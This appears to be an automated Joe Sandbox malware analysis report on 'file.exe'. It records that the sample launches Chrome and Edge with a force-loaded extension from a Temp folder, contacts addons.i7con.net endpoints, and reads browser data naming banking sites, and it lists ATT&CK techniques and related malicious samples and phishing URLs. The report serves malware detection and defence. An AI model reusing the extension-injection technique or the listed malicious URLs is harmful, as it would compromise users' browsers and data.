Source: Web Data.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Web Data.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Web Data.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Web Data.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
Source: Web Data.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Web Data.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"Jump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		1
Registry Run Keys / Startup Folder		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Browser Session Hijacking		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets12
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Timestomp		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1424925 Sample: file.exe Startdate: 12/04/2024 Architecture: WINDOWS Score: 48 30 ntp.msn.com 2->30 32 bzib.nelreports.net 2->32 34 addons.i7con.net 2->34 54 Multi AV Scanner detection for submitted file 2->54 8 file.exe 7 2->8         started        10 msedge.exe 28 400 2->10         started        signatures3 process4 process5 12 chrome.exe 14 8->12         started        15 msedge.exe 10 8->15         started        17 msedge.exe 14 10->17         started        19 msedge.exe 10->19         started        21 msedge.exe 10->21         started        23 msedge.exe 10->23         started        dnsIp6 42 192.168.2.13 unknown unknown 12->42 44 192.168.2.5, 443, 49707, 49708 unknown unknown 12->44 46 239.255.255.250 unknown Reserved 12->46 25 chrome.exe 12->25         started        28 msedge.exe 15->28         started        48 13.107.213.40, 443, 49767, 49768 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->48 50 ssl.bingadsedgeextension-prod-eastus.azurewebsites.net 40.71.99.188, 443, 49714, 49717 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 17->50 52 11 other IPs or domains 17->52 process7 dnsIp8 36 addons.i7con.net 23.106.238.238, 443, 49719, 49720 LEASEWEB-USA-SFO-12US United Kingdom 25->36 38 www.google.com 142.251.40.132, 443, 49707, 49708 GOOGLEUS United States 25->38 40 chrome.cloudflare-dns.com 25->40

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe5%ReversingLabs
file.exe13%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
chrome.cloudflare-dns.com0%VirustotalBrowse
addons.i7con.net0%VirustotalBrowse
ssl.bingadsedgeextension-prod-eastus.azurewebsites.net0%VirustotalBrowse
bzib.nelreports.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://unitedstates1.ss.wd.microsoft.us/0%URL Reputationsafe
https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
https://bzib.nelreports.net/api/report?cat=bingbusiness0%URL Reputationsafe
https://chrome.cloudflare-dns.com/dns-query0%URL Reputationsafe
https://unitedstates2.ss.wd.microsoft.us/0%URL Reputationsafe
https://unitedstates4.ss.wd.microsoft.us/0%URL Reputationsafe
https://addons.i7con.net0%Avira URL Cloudsafe
https://addons.i7con.net/ext/antlog?1=1&from=Chrome10%Avira URL Cloudsafe
https://addons.i7con.net/ext/installed?1=1&from=Chrome10%Avira URL Cloudsafe
http://www.gzip.org/zlib/rfc-gzip.html0%Avira URL Cloudsafe
https://deff.nelreports.net/api/report0%Avira URL Cloudsafe
https://addons.i7con.net/ext/analytic?do=init&from=Chrome10%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msnw0%Avira URL Cloudsafe
http://www.gzip.org/zlib/rfc-gzip.html0%VirustotalBrowse
https://addons.i7con.net0%VirustotalBrowse
https://deff.nelreports.net/api/report?cat=msnw0%VirustotalBrowse
https://deff.nelreports.net/api/report0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalseunknown
addons.i7con.net
23.106.238.238
truefalseunknown
www.google.com
142.251.40.132
truefalse
    		high
    ssl.bingadsedgeextension-prod-eastus.azurewebsites.net
    		40.71.99.188
    		truefalseunknown
    googlehosted.l.googleusercontent.com
    		142.251.40.97
    		truefalse
      		high
      clients2.googleusercontent.com
      		unknown
      		unknownfalse
        		high
        bzib.nelreports.net
        		unknown
        		unknownfalseunknown
        ntp.msn.com
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://addons.i7con.net/ext/installed?1=1&from=Chrome1false
          • Avira URL Cloud: safe
          		unknown
          https://clients2.googleusercontent.com/crx/blobs/AfQPRnlnN3Mw8JIDvDD8lN9JQMGrnMry7wIOvVHOXgBo8BiA4Tc8VkbwTJGYjci0916e7uqSj344p5MqtR4g76CAefLNLtk5vSAF3_GUbh6fLcZenrmAAMZSmuUkzxMqWGdyV0Tn8REW3yyr1cG7Ag/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_75_4_0.crxfalse
            		high
            https://addons.i7con.net/ext/antlog?1=1&from=Chrome1false
            • Avira URL Cloud: safe
            		unknown
            https://deff.nelreports.net/api/report?cat=msnfalse
            • URL Reputation: safe
            		unknown
            https://www.google.com/async/ddljson?async=ntp:2false
              		high
              https://bzib.nelreports.net/api/report?cat=bingbusinessfalse
              • URL Reputation: safe
              		unknown
              https://addons.i7con.net/ext/analytic?do=init&from=Chrome1false
              • Avira URL Cloud: safe
              		unknown
              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                		high
                https://chrome.cloudflare-dns.com/dns-queryfalse
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.gzip.org/zlib/rfc-gzip.htmlfile.exe, 00000000.00000002.2094473728.0000020100072000.00000004.00000800.00020000.00000000.sdmp, background.js.0.dr, 2cc80dabc69f58b6_0.7.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/chrome_newtabWeb Data.7.drfalse
                  		high
                  https://duckduckgo.com/ac/?q=Web Data.7.drfalse
                    		high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoWeb Data.7.drfalse
                      		high
                      https://addons.i7con.netfile.exe, 00000000.00000002.2094473728.0000020100072000.00000004.00000800.00020000.00000000.sdmp, 2cc80dabc69f58b6_1.7.dr, background.js.0.dr, 2cc80dabc69f58b6_0.7.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive-daily-2.corp.google.com/manifest.json.7.drfalse
                        		high
                        https://drive-autopush.corp.google.com/manifest.json.7.drfalse
                          		high
                          https://drive-daily-4.corp.google.com/manifest.json.7.drfalse
                            		high
                            https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.7.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Web Data.7.drfalse
                              		high
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Web Data.7.drfalse
                                		high
                                https://drive-daily-1.corp.google.com/manifest.json.7.drfalse
                                  		high
                                  https://deff.nelreports.net/api/reportReporting and NEL.8.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://drive-daily-5.corp.google.com/manifest.json.7.drfalse
                                    		high
                                    https://docs.google.com/manifest.json.7.drfalse
                                      		high
                                      https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.8.drfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://drive-staging.corp.google.com/manifest.json.7.drfalse
                                        		high
                                        https://www.google.com/chromecontent_new.js.7.dr, content.js.7.drfalse
                                          		high
                                          https://drive-daily-6.corp.google.com/manifest.json.7.drfalse
                                            		high
                                            https://drive.google.com/manifest.json.7.drfalse
                                              		high
                                              https://drive-daily-0.corp.google.com/manifest.json.7.drfalse
                                                		high
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchWeb Data.7.drfalse
                                                  		high
                                                  https://chromewebstore.google.com/manifest.json0.7.drfalse
                                                    		high
                                                    https://drive-preprod.corp.google.com/manifest.json.7.drfalse
                                                      		high
                                                      https://clients2.googleusercontent.com16324bac-1af0-430c-9688-7b1e7b63030e.tmp.8.drfalse
                                                        		high
                                                        https://chrome.google.com/webstore/manifest.json0.7.drfalse
                                                          		high
                                                          https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.7.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.7.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.2094473728.0000020100001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ntp.msn.com/000003.log4.7.drfalse
                                                              		high
                                                              https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startSession_13357379681647682.7.drfalse
                                                                		high
                                                                http://www.google.com/file.exe, 00000000.00000002.2094473728.0000020100072000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2094473728.000002010005E000.00000004.00000800.00020000.00000000.sdmp, manifest.json.0.drfalse
                                                                  		high
                                                                  https://drive-daily-3.corp.google.com/manifest.json.7.drfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    152.195.19.97
                                                                    		unknownUnited States
                                                                    		15133EDGECASTUSfalse
                                                                    142.251.40.132
                                                                    		www.google.comUnited States
                                                                    		15169GOOGLEUSfalse
                                                                    162.159.61.3
                                                                    		unknownUnited States
                                                                    		13335CLOUDFLARENETUSfalse
                                                                    23.40.179.37
                                                                    		unknownUnited States
                                                                    		16625AKAMAI-ASUSfalse
                                                                    40.71.99.188
                                                                    		ssl.bingadsedgeextension-prod-eastus.azurewebsites.netUnited States
                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    13.107.213.40
                                                                    		unknownUnited States
                                                                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                    172.64.41.3
                                                                    		chrome.cloudflare-dns.comUnited States
                                                                    		13335CLOUDFLARENETUSfalse
                                                                    23.200.0.38
                                                                    		unknownUnited States
                                                                    		20940AKAMAI-ASN1EUfalse
                                                                    23.106.238.238
                                                                    		addons.i7con.netUnited Kingdom
                                                                    		7203LEASEWEB-USA-SFO-12USfalse
                                                                    239.255.255.250
                                                                    		unknownReserved
                                                                    		unknownunknownfalse
                                                                    142.251.40.97
                                                                    		googlehosted.l.googleusercontent.comUnited States
                                                                    		15169GOOGLEUSfalse

                                                                    Private

                                                                    IP
                                                                    192.168.2.5
                                                                    192.168.2.13

                                                                    General Information

                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                    Analysis ID:1424925
                                                                    Start date and time:2024-04-12 09:13:39 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 36s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Run name:Run with higher sleep bypass
                                                                    Number of analysed new started processes analysed:19
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal48.winEXE@75/259@38/13
                                                                    EGA Information:Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 53%
                                                                    • Number of executed functions: 67
                                                                    • Number of non-executed functions: 2
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 142.250.176.195, 142.251.35.174, 142.250.31.84, 13.107.6.158, 204.79.197.203, 13.107.42.16, 142.250.176.206, 204.79.197.239, 13.107.21.239, 142.250.80.74, 142.250.80.10, 142.250.65.234, 142.250.81.234, 142.251.40.138, 142.250.72.106, 142.250.65.202, 142.250.80.42, 142.250.176.202, 142.251.40.170, 142.250.64.74, 142.250.65.170, 142.251.41.10, 142.251.40.202, 142.251.40.234, 142.250.80.106, 34.104.35.123, 13.107.21.200, 204.79.197.200, 20.88.206.205, 72.21.81.240, 172.183.192.109, 192.229.211.108, 142.251.40.106, 142.250.64.106, 142.251.32.106, 142.251.35.170, 142.250.65.163, 142.251.40.142, 142.250.80.67, 142.251.40.227, 142.251.40.195, 142.250.64.67
                                                                    • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, tm-prod-wd-csp-edge.trafficmanager.net, clients2.google.com, ocsp.digicert.com, prod-agic-scu-2.southcentralus.cloudapp.azure.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, update.googleapis.com, www.gstatic.com, l-0007.l-msedge.net, config.edge.skype.com, optimizationguide-pa.googleapis.com, www.bing.com, clients1.google.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, prod-agic-ncu-2.northcentralus.cloudapp.azure.com, accounts.google.com, bingadsedgeextension-prod.trafficmanager.net, bzib.nelreports.net.akamaized.net, api.edgeoffer.microsoft.com, dual-a-0001.a-msedge.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, b-0005.b-msedge.net, www-msn-com.a-0003.a-msedge.net, www-www.bing.com.trafficmanager.net, edge.microsoft.
                                                                    • Execution Graph export aborted for target file.exe, PID 4672 because it is empty
                                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    162.159.61.3SecuriteInfo.com.Win32.Evo-gen.30889.28387.exeGet hashmaliciousPafishBrowse
                                                                      Payslip-9583.exeGet hashmaliciousUnknownBrowse
                                                                        SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                          SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                            SenPalia Installer.exeGet hashmaliciousUnknownBrowse
                                                                              SenPalia Installer.exeGet hashmaliciousUnknownBrowse
                                                                                http://woollamau.comGet hashmaliciousUnknownBrowse
                                                                                  O28gzBGj5H.svgGet hashmaliciousUnknownBrowse
                                                                                    Quarantined Messages.zipGet hashmaliciousUnknownBrowse
                                                                                      23.40.179.37Acrobat_Set-Up.exeGet hashmaliciousUnknownBrowse
                                                                                        http://213.109.202.222/download/xml.xmlGet hashmaliciousCobaltStrikeBrowse
                                                                                          web_search_tool (1).docmGet hashmaliciousUnknownBrowse
                                                                                            SecuriteInfo.com.Win32.TrojanX-gen.32025.7334.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                              I2jCDr35mu.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                jk98mGM6JH.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                  SecuriteInfo.com.Trojan.Siggen23.22903.15219.31710.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                                                                    40.71.99.188Payslip-9583.exeGet hashmaliciousUnknownBrowse
                                                                                                      http://woollamau.comGet hashmaliciousUnknownBrowse
                                                                                                        Setup.msiGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                          27-3-24 release.zipGet hashmaliciousUnknownBrowse
                                                                                                            http://shsh.caGet hashmaliciousUnknownBrowse
                                                                                                              http://shsh.caGet hashmaliciousUnknownBrowse
                                                                                                                http://www.shsh.caGet hashmaliciousUnknownBrowse
                                                                                                                  NetskopeLogs.zipGet hashmaliciousUnknownBrowse
                                                                                                                    FW EXT Serge Bozhko sent you Air Lease Corporation-VRC CH 12032024 via PandaDoc.msgGet hashmaliciousUnknownBrowse
                                                                                                                      http://213.109.202.222/download/xml.xmlGet hashmaliciousCobaltStrikeBrowse
                                                                                                                        13.107.213.40PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                                                                                                                        • 2s.gg/42Q
                                                                                                                        Quotation.xlsGet hashmaliciousUnknownBrowse
                                                                                                                        • 2s.gg/3zM
                                                                                                                        152.195.19.97https://editioncnn.anniesnewburypport.com/c2FsZXNAY2VudHJhbGlhbi5jb20uYXU=Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                          https://autode.sk/3xAlkplGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                            Ofsoptics-Documents734.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FAspenleafenergy/MGJeH92547MGJeH92547MGJeH/ZXJpYy5maXNjaGVyQGFzcGVubGVhZmVuZXJneS5jb20=Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                2024 Lcatterton Tom.lacalamito 401K Contribution-380932.docxGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                  https://workupdatenotification.org/MbnVuby5jYXJ2YWxob3NhQG9tdGVsLnB0?__cf_chl_tk=uqKlJcrq2QaVDejSQZgFx.XTKCVqa9cxPA.LV4SBvto-1712774849-0.0.1.1-1663Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                    http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=126090168=%0A66&endereco=//e-tahta%E3%80%82com/temp/___YXVkcmV5amVnbGFAaHNjcG9seS5jb20=___syuuzkolfxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=126090168=%0A66&endereco=//astrolojidersleri%E3%80%82net/temp/___cnlhbnNAcHJlc2lkaW8uY29t___qegpdlclfvGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                        Payslip-9583.exeGet hashmaliciousUnknownBrowse

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          ssl.bingadsedgeextension-prod-eastus.azurewebsites.netPayslip-9583.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          http://woollamau.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          Setup.msiGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          27-3-24 release.zipGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          http://shsh.caGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          http://shsh.caGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          http://www.shsh.caGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          NetskopeLogs.zipGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          FW EXT Serge Bozhko sent you Air Lease Corporation-VRC CH 12032024 via PandaDoc.msgGet hashmaliciousUnknownBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          http://213.109.202.222/download/xml.xmlGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                          • 40.71.99.188
                                                                                                                                          chrome.cloudflare-dns.comSecuriteInfo.com.Win32.Evo-gen.30889.28387.exeGet hashmaliciousPafishBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          Payslip-9583.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          SetupSpuckwars_1.15.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          SenPalia Installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          SenPalia Installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          http://woollamau.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.64.41.3
                                                                                                                                          http://woollamau.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.61.3
                                                                                                                                          O28gzBGj5H.svgGet hashmaliciousUnknownBrowse
                                                                                                                                          • 162.159.61.3

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          CLOUDFLARENETUSSwift_copy.pdf (2).exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          Trommels.jsGet hashmaliciousWSHRATBrowse
                                                                                                                                          • 104.20.67.143
                                                                                                                                          cztHvQ3518.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 172.67.202.86
                                                                                                                                          httpswe.tlt-gbqS8lgkw9.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Launcher.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                          • 104.21.75.133
                                                                                                                                          RobloxAIO CHEAT.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                          • 104.21.75.133
                                                                                                                                          17129026260efdd91c6d1ffeca6e8eda3ece36cd849272dce1a2d9ab3c208be65a370d4493880.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          valoranthack.exeGet hashmaliciousLuna LoggerBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUS5lrOsR7kdX.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 21.203.112.212
                                                                                                                                          5WNvSSc9Us.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                          • 20.157.87.45
                                                                                                                                          biJzn18IpC.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                          • 20.157.87.45
                                                                                                                                          WXumwpIyz7.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                          • 20.157.87.45
                                                                                                                                          G9kofbyXT1.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                          • 20.157.87.45
                                                                                                                                          https://wwwlkwmwm12m21mm211.z13.web.core.windows.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 13.107.21.200
                                                                                                                                          http://tacticaloutsourcing.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 13.107.246.40
                                                                                                                                          440e4d.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                          • 20.60.197.1
                                                                                                                                          https://dhl.9021.tripgg.com/home/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 13.107.246.40
                                                                                                                                          AKAMAI-ASUShttps://wwwlkwmwm12m21mm211.z13.web.core.windows.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 23.223.209.69
                                                                                                                                          llADOrptJY.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 23.54.12.239
                                                                                                                                          http://bckonline.com/2018/12/21/orlando-brown-tells-dr-phil-that-he-has-four-kids-and-the-2-year-old-is-still-in-the-belly-video/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 23.47.168.66
